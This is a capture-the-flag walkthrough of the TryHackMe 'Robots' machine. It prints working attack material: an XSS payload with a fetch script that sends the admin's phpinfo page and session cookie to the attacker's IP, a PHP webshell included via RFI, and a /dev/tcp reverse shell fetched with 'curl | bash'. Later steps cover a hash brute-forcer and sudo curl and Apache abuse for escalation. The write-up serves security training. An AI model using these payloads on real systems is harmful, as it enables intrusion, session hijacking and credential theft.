Robots
A (small) tribute to I. Asimov.
Recon
We begin with an Nmap scan and discover three open ports: port 22 running SSH, and ports 80 and 9000 hosting web servers. The default script scan also reveals the entries in robots.txt.
āāā(kalićækali)-[~/Desktop/THM]
āā$ nmap -p- robots.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 11:19 IST
Nmap scan report for robots.thm (10.10.110.224)
Host is up (0.15s latency).
Not shown: 65508 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9000/tcp open cslistener
Nmap done: 1 IP address (1 host up) scanned in 830.34 seconds
āāā(kalićækali)-[~/Desktop/THM]
āā$ nmap -sC -sV -sT -p 22,80,9000 robots.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 11:43 IST
Nmap scan report for robots.thm (10.10.110.224)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.61
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.61 (Debian)
| http-robots.txt: 3 disallowed entries
|_/harming/humans /ignoring/human/orders /harm/to/self
9000/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds
The robots.txt file reveals several interesting directories:
/harming/humans
/ignoring/human/orders
/harm/to/self
When we visit the index page of the site on port 80
, we receive a 403 Forbidden
response.

On port 9000
, weāre presented with the default Apache2
landing page.

We check the directories listed in robots.txt
, but most return a 403 Forbidden
errorāexcept for /harm/to/self
, which displays a login page.

We access the login page and note that it's a PHP-based form. Unfortunately, it provides no feedback upon submission, making it difficult to enumerate valid usernames.

We use feroxbuster to enumerate additional directories and PHP pages under /harm/to/self. Among the results, we find admin.php, but access is restricted without proper authorization.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ feroxbuster -u 'http://robots.thm/harm/to/self' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher š¤ ver: 2.10.3
āāāāāāāāāāāāāāāāāāāāāāāāāāāā¬āāāāāāāāāāāāāāāāāāāāāā
šÆ Target Url ā http://robots.thm/harm/to/self
š Threads ā 50
š Wordlist ā /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
š Status Codes ā All Status Codes!
š„ Timeout (secs) ā 7
𦔠User-Agent ā feroxbuster/2.10.3
š Config File ā /etc/feroxbuster/ferox-config.toml
š Extract Links ā true
š² Extensions ā [php]
š HTTP methods ā [GET]
š Recursion Depth ā 4
š New Version Available ā https://github.com/epi052/feroxbuster/releases/latest
āāāāāāāāāāāāāāāāāāāāāāāāāāāā“āāāāāāāāāāāāāāāāāāāāāā
š Press [ENTER] to use the Scan Management Menuā¢
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
404 GET 9l 31w 272c http://robots.thm/harm/to/harming/
404 GET 9l 31w 272c http://robots.thm/harm/to/ignoring/
404 GET 9l 31w 272c http://robots.thm/harm/to/harming/humans
404 GET 9l 31w 272c http://robots.thm/harm/to/harm/to/self
404 GET 9l 31w 272c http://robots.thm/harm/to/ignoring/human/
404 GET 9l 31w 272c http://robots.thm/harm/to/ignoring/human/orders
404 GET 9l 31w 272c http://robots.thm/harm/to/harm/to/
404 GET 9l 31w 272c http://robots.thm/harm/to/harm/
403 GET 9l 28w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 315c http://robots.thm/harm/to/self => http://robots.thm/harm/to/self/
200 GET 427l 1133w 7797c http://robots.thm/harm/to/self/css/normalize.css
200 GET 418l 1043w 11452c http://robots.thm/harm/to/self/css/skeleton.css
200 GET 27l 31w 370c http://robots.thm/harm/to/self/admin.php
200 GET 0l 0w 0c http://robots.thm/harm/to/self/config.php
301 GET 9l 28w 319c http://robots.thm/harm/to/self/css => http://robots.thm/harm/to/self/css/
200 GET 38l 75w 976c http://robots.thm/harm/to/self/register.php
200 GET 36l 59w 795c http://robots.thm/harm/to/self/login.php
200 GET 34l 54w 662c http://robots.thm/harm/to/self/index.php
302 GET 0l 0w 0c http://robots.thm/harm/to/self/logout.php => index.php
[####################] - 3m 40981/40981 0s found:18 errors:0
[####################] - 2m 20477/20477 150/s http://robots.thm/harm/to/self/
[####################] - 2m 20477/20477 148/s http://robots.thm/harm/to/self/css/
We proceed to register a new user by providing a username and date of birth. The system informs us that the initial password is generated by taking the MD5 hash of the username concatenated with the day and month of the date of birth.

We calculate our hash with CyberChef and login.


After logging in, weāre directed to the index page of /harm/to/self. Our username is reflected on the page, and we also notice indications of an Admin user. In the top-left corner, thereās a link labeled Server Info.

Clicking the Server Info link reveals the phpinfo() page. We'll soon explain how this information can be highly useful for our purposes.

Initial Access
XSS via Username
Since the username is reflected on the page, we test for XSS by registering a user with a simple payload as the username. After logging in, the payload executes successfully, and we receive our alert.

If the admin also interacts with the page and views the list of usernames, our XSS payload could execute in their browser. This would allow us to steal the admin's cookie, giving us access to their session and enabling interaction with admin.php, which we previously discovered during the gobuster scan.
Unfortunately, the HttpOnly flag is set on the cookie. This flag prevents JavaScript from accessing the cookie directly, making it accessible only through HTTP requestsāspecifically to protect against XSS-based cookie theft.

However, we have an alternative method to access the cookie, as demonstrated in the following article. As previously mentioned, the phpinfo() page could play a crucial role in this approach.
We can exploit the phpinfo() page to steal the cookie, leveraging the detailed request data it displaysāsuch as headers and environment variablesāwhen accessed with our crafted XSS payload.

We use a script from HackTricks to exploit this technique, hosting it on our own web server. The script triggers the admin's browser to send a request to the phpinfo() page, including their session cookie, which is then exposed in the server logs or request details.
async function exfil() {
const response = await fetch('/harm/to/self/server_info.php');
const text = await response.text();
await fetch('http://10.17.15.155:1337/exfil', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: `data=${btoa(text)}`
});
}
exfil();
After modifying xss.js, we observe the first indication of success: a request is made to our server to fetch the xss.js file, confirming that the XSS payload has been executed in the admin's browser.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.110.224 - - [05/May/2025 16:45:25] "GET /xss.js HTTP/1.1" 200 -
10.17.15.155 - - [05/May/2025 16:45:28] "GET /xss.js HTTP/1.1" 200 -
10.17.15.155 - - [05/May/2025 16:45:29] "GET /xss.js HTTP/1.1" 200 -
10.10.110.224 - - [05/May/2025 16:46:25] "GET /xss.js HTTP/1.1" 304 -
Next, with our listener running on port 81, we capture the exfiltrated phpinfo() contents, which include valuable details such as session cookies and other sensitive server information.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.110.224] 51804
POST /exfil HTTP/1.1
Host: 10.17.15.155:1337
Connection: keep-alive
Content-Length: 99145
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/127.0.6533.119 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://robots.thm
Referer: http://robots.thm/
Accept-Encoding: gzip, deflate
data=PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FT
..........
We save the base64-encoded data parameter from the response to a file and then decode it to extract the information, which might include the session cookie or other useful data.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ base64 -d server_info_base64.php > server_info.html
By opening server_info.html in a browser, we confirm the captured PHPSESSID, which is the session ID of the admin, allowing us to hijack their session.

PHPSESSID=ign959419do8tqiqsleg9i5jed
Using the stolen PHPSESSID cookie, we modify our session cookie and navigate to http://robots.thm/harm/to/self/index.php.
We successfully log in as admin, but the dashboard appears unchanged, indicating that we may need to access more specific admin functionality, like admin.php, to see a difference.

Remote File Inclusion
During our feroxbuster scan, we discovered admin.php. Letās try accessing it now to see if it reveals any admin-specific functionality or content.
When navigating to http://robots.thm/harm/to/self/admin.php, we encounter a form that allows us to submit URLs, likely for admin-related functionality.

To test the form, we submit a URL pointing to our own web server (http://10.17.15.155/test), observing how the system handles external requests.
We successfully observe a request being made to our server, confirming that the submitted URL is being fetchedālikely server-sideāby the admin interface.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.110.224 - - [05/May/2025 17:02:56] code 404, message File not found
10.10.110.224 - - [05/May/2025 17:02:56] "GET /test HTTP/1.1" 404 -
10.10.110.224 - - [05/May/2025 17:03:27] "GET /xss.js HTTP/1.1" 304 -
10.10.110.224 - - [05/May/2025 17:03:58] code 404, message File not found
10.10.110.224 - - [05/May/2025 17:03:58] "GET /test HTTP/1.1" 404 -
The admin.php page returns an error message indicating that our submitted URL was passed to the include() function, strongly suggesting a Remote File Inclusion (RFI) vulnerability.

Since Remote File Inclusion (RFI) is possible, we host a simple webshell on our server to be included and executed by the target when we submit its URL.
echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php
We submit the URL of our webshell (http://10.17.15.155/cmd.php) to the admin.php form along with a command, such as cmd=id
.
http://10.17.15.155/cmd.php&cmd=id
Shortly after, we observe a request to cmd.php on our server, confirming that the target has fetched and likely executed the webshell.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.110.224 - - [05/May/2025 17:09:05] "GET /cmd.php?cmd=id HTTP/1.1" 200 -
And we can see the output of the command directly in the response.

To gain an interactive shell, we prepare a reverse shell payload hosted on our web server, which the target will include and execute via the RFI vulnerability.
echo '/bin/bash -i >& /dev/tcp/10.17.15.155/1336 0>&1' > index.html
We then use the same RFI method to include our webshell and execute the command:
curl 10.17.15.155|bash

This fetches and runs our reverse shell script, establishing a connection back to our listener.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ nc -lvnp 1336
listening on [any] 1336 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.110.224] 59048
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@robots:/var/www/html/harm/to/self$ script -qc /bin/bash /dev/null
script -qc /bin/bash /dev/null
www-data@robots:/var/www/html/harm/to/self$ ^Z
zsh: suspended nc -lvnp 1336
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ stty raw -echo; fg
[1] + continued nc -lvnp 1336
www-data@robots:/var/www/html/harm/to/self$ export TERM=xterm
www-data@robots:/var/www/html/harm/to/self$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@robots:/var/www/html/harm/to/self$
Shell as rgiskard
Discovering Database Configuration
While reviewing the application files, we discover the database configuration inside /var/www/html/harm/to/self/config.php, which may contain critical information such as database credentials and connection settings.
www-data@robots:/var/www/html/harm/to/self$ ls
admin.php css login.php register.php
config.php index.php logout.php server_info.php
www-data@robots:/var/www/html/harm/to/self$ cat config.php
<?php
$servername = "db";
$username = "robots";
$password = "q4qCz1OflKvKwK4S";
$dbname = "web";
// Get the current hostname
$currentHostname = $_SERVER['HTTP_HOST'];
// Define the desired hostname
$desiredHostname = 'robots.thm';
// Check if the current hostname does not match the desired hostname
if ($currentHostname !== $desiredHostname) {
// Redirect to the desired hostname
header("Location: http://$desiredHostname" . $_SERVER['REQUEST_URI']);
exit();
}
ini_set('session.cookie_httponly', 1);
session_start();
?>
www-data@robots:/var/www/html/harm/to/self$
Connecting to the Database
From the configuration, we learn that the database is running on the db host. Using the getent command, we can retrieve the IP address associated with the db host:
www-data@robots:/var/www/html/harm/to/self$ getent hosts db
172.18.0.2 db
Since the mysql client is not installed in the container, we can use chisel to set up port forwarding and connect to the database from our local machine.
Set up a chisel server on our local machine:
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ chisel server -p 7777 --reverse
2025/05/05 17:28:30 server: Reverse tunnelling enabled
2025/05/05 17:28:30 server: Fingerprint Sr37ry/TrThxyOehz2gwY08ITVlqRX22UJrw8e79jy8=
2025/05/05 17:28:30 server: Listening on http://0.0.0.0:7777
Next, we transfer chisel into the container using curl:
www-data@robots:/var/www/html/harm/to/self$ curl -s http://10.17.15.155/chisel -o /tmp/chisel
We forward the database port using chisel:
www-data@robots:/tmp$ chmod +x chisel
www-data@robots:/tmp$ ls -la
total 3812
drwxrwxrwt 1 root root 4096 May 5 12:00 .
drwxr-xr-x 1 root root 4096 Aug 19 2024 ..
-rwxr-xr-x 1 www-data www-data 3887104 May 5 12:01 chisel
-rw------- 1 www-data www-data 0 May 5 11:28 sess_71b563q2smmoftfeti6hrdlse4
-rw------- 1 www-data www-data 35 May 5 11:49 sess_ign959419do8tqiqsleg9i5jed
-rw------- 1 www-data www-data 81 May 5 11:26 sess_stb7agvvoq6u9okvd2l2ilrop8
www-data@robots:/tmp$ ./chisel client 10.17.15.155:7777 R:3306:172.18.0.2:3306
2025/05/05 12:37:51 client: Connecting to ws://10.17.15.155:7777
2025/05/05 12:37:52 client: Connected (Latency 145.973278ms)
With the database now accessible from our local machine, we can connect to it, list the tables, and extract the stored user password hashes.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ mysql -u robots -pq4qCz1OflKvKwK4S -h 127.0.0.1 -D web
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1330
Server version: 11.5.2-MariaDB-ubu2404 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [web]> show tables;
+---------------+
| Tables_in_web |
+---------------+
| logins |
| users |
+---------------+
2 rows in set (0.146 sec)
MariaDB [web]> select * from users;
+----+----------------------------------------------------+------------+---------+
| id | username | password | group |
+----+----------------------------------------------------+------------+---------+
| 1 | admin | [REDACTED] | admin |
| 2 | rgiskard | [REDACTED] | nologin |
| 3 | burning | [REDACTED] | guest |
| 4 | <script>alert("test");</script> | [REDACTED] | guest |
| 5 | <script src="http://10.17.15.155/xss.js"></script> | [REDACTED] | guest |
+----+----------------------------------------------------+------------+---------+
5 rows in set (0.145 sec)
MariaDB [web]>
Cracking the Hash
Now that we have the hash for the rgiskard user, we can try to crack it. From our earlier observations on the webserver, we know that passwords follow the format md5(username + DDMM)
.
Reviewing login.php
, we see that this value is hashed again with md5
before being compared to the database. Therefore, the hashes stored in the database follow the format:
md5(md5(username + DDMM))
.
With this knowledge, we can write a Python script that brute-forces all possible day and month combinations (i.e., values from 0101
to 3112
) for the date of birth, constructs the password as md5(md5(username + DDMM))
, and compares the result to the hash retrieved from the database.
import hashlib
# Replace this with the actual hash from the database (double MD5)
target_hash = "REPLACE_WITH_DB_HASH"
username = "rgiskard"
def md5(value):
return hashlib.md5(value.encode()).hexdigest()
def double_md5(value):
return hashlib.md5(md5(value).encode()).hexdigest()
for day in range(1, 32):
for month in range(1, 13):
ddmm = f"{day:02d}{month:02d}"
raw_password = username + ddmm
inner_hash = md5(raw_password)
final_hash = hashlib.md5(inner_hash.encode()).hexdigest()
if final_hash == target_hash:
print(f"[+] Match found! DOB: {ddmm} | MD5(username+DOB): {inner_hash}")
exit()
print("[-] No match found.")
Running the script, we successfully discover the password for the rgiskard
user.

Shell as dolivaw
Although the plain password doesn't work, we can use the MD5 hashed password with SSH to gain shell access as the rgiskard
user on the host.
āāā(kalićækali)-[~/Desktop/THM/robots]
āā$ ssh rgiskard@robots.thm
The authenticity of host 'robots.thm (10.10.187.202)' can't be established.
ED25519 key fingerprint is SHA256:JpR2XY5mhYUXMxSyJMTsGb1IMrerkDpl7EB+rhuiTNU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'robots.thm' (ED25519) to the list of known hosts.
rgiskard@robots.thm's password:
rgiskard@ubuntu-jammy:~$ id
uid=1002(rgiskard) gid=1002(rgiskard) groups=1002(rgiskard)
rgiskard@ubuntu-jammy:~$
After checking the rgiskard
user's sudo privileges, we discover that they are allowed to run the /usr/bin/curl 127.0.0.1/*
command as the dolivaw
user.

From the sudo
configuration, while the first URL we pass to curl
must be 127.0.0.1/
, curl
accepts multiple URLs in a single command. Combining this with the file://
protocol, which curl
also accepts, we can simply read the user
flag as follows:
From the sudo configuration, while the first URL we pass to curl
must be 127.0.0.1/
, curl
accepts multiple URLs in a single command. By combining this with the file://
protocol, which curl
also supports, we can easily read the user flag like this:

To get a shell as the dolivaw
user, we can use curl
's -o
option to save the responses from the requests to a file. This allows us to write our public SSH key to the userās authorized_keys
file.
Here are the steps:
Generate a key pair (if you don't already have one):
ssh-keygen -t ed25519 -f id_ed25519
This will create
id_ed25519
(private key) andid_ed25519.pub
(public key).Serve the public key from your web server. If you're using a simple HTTP server (for example, Python's
http.server
), navigate to the directory whereid_ed25519.pub
is located and start the server:python3 -m http.server 8000
This will serve the public key at
http://<your-ip>:8000/id_ed25519.pub
.Use
curl
to fetch the public key and then we can add todolivaw
user'sauthorized_keys
file:sudo -u dolivaw /usr/bin/curl 127.0.0.1/ http://10.17.15.155/id_ed25519.pub -o /tmp/1 -o /home/dolivaw/.ssh/authorized_keys
Ensure that the
/home/dolivaw/.ssh/
directory exists and has the correct permissions (you might need to create it first if necessary).SSH into the
dolivaw
user using the private key (id_ed25519
):ssh -i id_ed25519 dolivaw@robots.thm
This will allow you to get a shell as the dolivaw
user by using the SSH key you added to the authorized_keys
file.

Privilege Escalation
After checking the sudo privileges for the dolivaw
user, we discover that they are able to run /usr/sbin/apache2
as the root user. This gives us the ability to control and configure the Apache2 server.

There are several ways we can leverage Apache2
to either read the root flag or gain root shell access.
The simplest method, which is mentioned below allows us to easily read the root flag.
Apache2 lets us specify directives either through configuration files or command-line arguments. We can make use of the Include
directive, which includes additional configuration files. Hereās the key point: if we try to include a file that doesn't contain valid directives, Apache2 will simply print an error along with the contents of the included file.
We can exploit this behavior by including the root flag, as it obviously won't contain valid directives, and Apache2 will output its contents as part of the error message.

As we can see, when attempting this, we encounter an error because APACHE_RUN_DIR
is not defined. However, this isn't an issue for us, as we can easily define it using another directive. Once we do that, we can successfully include our file, and Apache2 will print the contents of the root flag.

Last updated
Was this helpful?